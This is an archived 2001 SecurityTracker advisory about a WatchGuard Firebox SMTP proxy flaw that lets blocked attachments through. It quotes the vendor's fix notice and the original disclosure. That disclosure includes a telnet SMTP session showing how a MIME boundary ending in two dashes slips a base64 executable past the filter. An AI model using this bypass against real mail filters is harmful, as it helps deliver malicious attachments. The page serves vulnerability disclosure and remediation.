SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Device (Firewall)  >   Firebox Series (WatchGuard) Vendors:   WatchGuard
(WatchGuard Issues Fix) Re: WatchGuard Firebox Firewall SMTP Proxy Fails to Block E-mail Based Executables and Scripts in Certain Conditions
SecurityTracker Alert ID:  1001875
SecurityTracker URL:  http://securitytracker.com/id/1001875
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 29 2001
Impact:   Host/resource access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 4.5, 4.6
Description:   It is reported that the WatchGuard Firebox SMTP Proxy fails to properly block certain MIME attachments when configured to block them. This allows a remote user to pass a potentially hazardous e-mail attachment through the firewall.

The firewall reportedly includes an SMTP proxy that allows for the blocking of e-mail attachments by MIME type and by file extension. It is reported that, under certain conditions, this feature will fail to proerly block the attachments.

The vulnerability is believed to be due to improper identification of e-mail attachments when the MIME boundary contains certain characters. If the MIME boundary ends with two dashes, the vulnerability can reportedly be triggered.

Some example exploit configurations are included in the Source Message.

The vendor has reportedly been notified.
Impact:   A remote user can send a potentially hazardous e-mail attachment through the firewall even if the firewall is configured to block the attachment.
Solution:   Upgrade to 4.61.
Vendor URL:  www.watchguard.com/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  

Message History:   This archive entry is a follow-up to the message listed below.
Jun 9 2001 WatchGuard Firebox Firewall SMTP Proxy Fails to Block E-mail Based Executables and Scripts in Certain Conditions


 Source Message Contents
Date:  Thu, 28 Jun 2001 15:00:46 -0700
Subject:  RE: WatchGuard SMTP Proxy issue


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On June 8, Dante Mercurio sent word of a bug (below) in the WatchGuard
SMTP proxy originally reported to the WG-Users list by Thomas Boll.
MIME type filtering could be bypassed if an attachment was encoded
with base64 encoding and two dashes were appended to the MIME boundary
specifier. This bug has been fixed for the latest version of the code
(4.61). All current LiveSecurity subscribers can go to
http://www.watchguard.com/support to obtain the service pack that
addresses this bug (4.61 SP1). 


Sincerely, 
Steve Fallin
Director, Rapid Response Team
WatchGuard Technologies, Inc. 

- -----Original Message-----
From: Dante Mercurio [mailto:dmercurio@ccgsecurity.com]
Sent: Friday, June 08, 2001 1:27 PM
To: BUGTRAQ@securityfocus.com
Subject: WatchGuard SMTP Proxy issue


The WatchGuard firebox has an SMTP proxy that allows for the exclusion
of attachments by MIME type and by file extension. It has been found
that under certain conditions, this feature can be overridden,
allowing
files such as executables and VB script through the filter.

A customer of mine originally reported a problem on 12/19/00 with
WatchGuard case #255345. This was on version 4.5 of their LiveSecurity
software. On 5/27/01 Thomas Boll sent the following to the WG support
forum:

> -----Original Message-----
> From: Thomas Boll [mailto:tb@boll.ch]
> Sent: Sunday, May 27, 2001 7:13 PM
> To: 'wg-users@watchguard.com'
> Cc: 'krol@ssr.ch'
> Subject: [WG-Users] SMTP Vulnerability!
> 
> 
> Hi List
> 
> Users have reported that attachments blocked by file extension
> make it through the SMTP Proxy even if the file extension is
> on the blocked list (WG 4.6).
> 
> After some testing I believe that the MIME boundary is responsible
> for the SMTP Proxy to fail. If the MIME boundary ends in two dashes
> the Proxy will not correctly identify the attachment. This seems to
> be typical for Free BSD based systems. This behaviour can be simply
> tested on any firewall using the SMTP Proxy denying some attachments
> based on the filename. Consider the two examples at the end 
> of this message.
> 
> The reason seems to be obvious, two dashes end the MIME 
> container, which
> leads to a misinterpretation of the SMTP proxy. 
> 
> Regards
> Thomas
> 
> ==============================================================
> =========
> 
> # telnet smtpserv 25
> Trying xxx.xxx.xxx.xxx...
> Connected to xxx.xxx.xx.
> Escape character is '^]'.
> 220 SMTP service ready
> helo mydomain.com
> 250 Requested mail action okay, completed
> mail from: me@mydomain.com
> 250 Requested mail action okay, completed
> rcpt to: me@smtpserv.mydomain.com
> 250 Requested mail action okay, completed
> data
> 354 Start mail input; end with <CRLF>.<CRLF>
> Content-Type: multipart/mixed; boundary="--sugus"
> 
> ----sugus
> Content-Type: application/octet-stream; filename="Calc.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Calc.exe"
> 
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAA
> .
> 250 Requested mail action okay, completed
> 
> =====> THE ANSWER IS CORECT AS IN:
> ---------------------------------------------------------------
> From me@mydomain.com  Mon May 28 00:46:37 2001
> Return-Path: <me@mydomain.com>
> Delivered-To: me@smptserv.mydomain.com
> Content-Type: multipart/mixed; boundary="--sugus"
> Date: Mon, 28 May 2001 00:45:54 +0200 (CEST)
> From: mw@mydomain.com
> 
> ----sugus
> Content-Type: text/plain; charset=us-ascii
> 
> [Attachment denied by WatchGuard SMTP proxy (type 
> "application/octet-stream", filename "Calc.exe")]
> 
> 
> ==============================================================
> ============
> If however the boundary ends in --, the check will fail:
> 
> 
> .....
> Content-Type: multipart/mixed; boundary="--sugus--"
> 
> ----sugus--
> Content-Type: application/octet-stream; filename="Calc.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Calc.exe"
> 
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAA
> .
> 250 Requested mail action okay, completed
>   
> 
> THE RESULT IS WRONG NOW:
> 
> ----sugus--
> Content-Type: application/octet-stream; filename="Calc.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Calc.exe"
> 
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAA
> ...
> 
> =================================================================
> =========
> For help or to subscribe/unsubscribe, send mail to:
> wg-users-request@watchguard.com, with the word "subscribe", 
> "unsubscribe"
> or "help" in the body of the message.
> 

Versions 4.5 and 4.6 have been tested and confirmed vulnerable. It is
unknown if other versions are vulnerable also.

M. Dante Mercurio, CCNA, MCSE+I, CCSA
Consulting Services Manager
Continental Consulting Group, LLC
www.ccgsecurity.com <http://www.ccgsecurity.com> 
dmercurio@ccgsecurity.com <mailto:dmercurio@ccgsecurity.com> 

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2

iQA/AwUBOzupGk3Vi9lbkWzpEQLFdgCfR0ND15usVKG2aUC3e+0j8IBqU5gAn0j5
IIuHEp+UNN2GAejfeKB6K9Nd
=T9X0
-----END PGP SIGNATURE-----


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC